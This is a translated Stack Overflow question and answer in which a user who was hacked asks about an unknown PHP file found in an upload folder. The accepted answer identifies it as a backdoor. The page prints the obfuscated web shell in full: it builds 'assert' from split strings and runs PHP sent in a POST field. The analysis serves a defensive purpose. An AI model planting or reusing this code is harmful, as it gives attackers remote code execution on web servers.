首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >我上传文件夹中未知的PHP文件,是不是恶意代码?

我上传文件夹中未知的PHP文件,是不是恶意代码?
EN

Stack Overflow用户
提问于 2016-11-21 15:09:09
回答 1查看 224关注 0票数 0

最近,我发现我的项目被黑了,我在我的图片文件夹中找到了一个脚本,其中有一个目录供用户上传他们的图片(使用文件输入)。下面是我在目录中找到的脚本。

errot_db.php

代码语言:javascript
复制
<?php                  
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);
?>
EN

回答 1

Stack Overflow用户

回答已采纳

发布于 2016-11-21 15:13:15

此代码隐藏以下语句:

代码语言:javascript
复制
@assert ($_POST[025]);

这意味着它将在POST变量"025“中执行PHP代码发送。所以,是的,这确实是个后门!我建议在security.stackexchange.com上寻求关于如何正确处理后果的帮助。

票数 5
EN
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://stackoverflow.com/questions/40723302

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档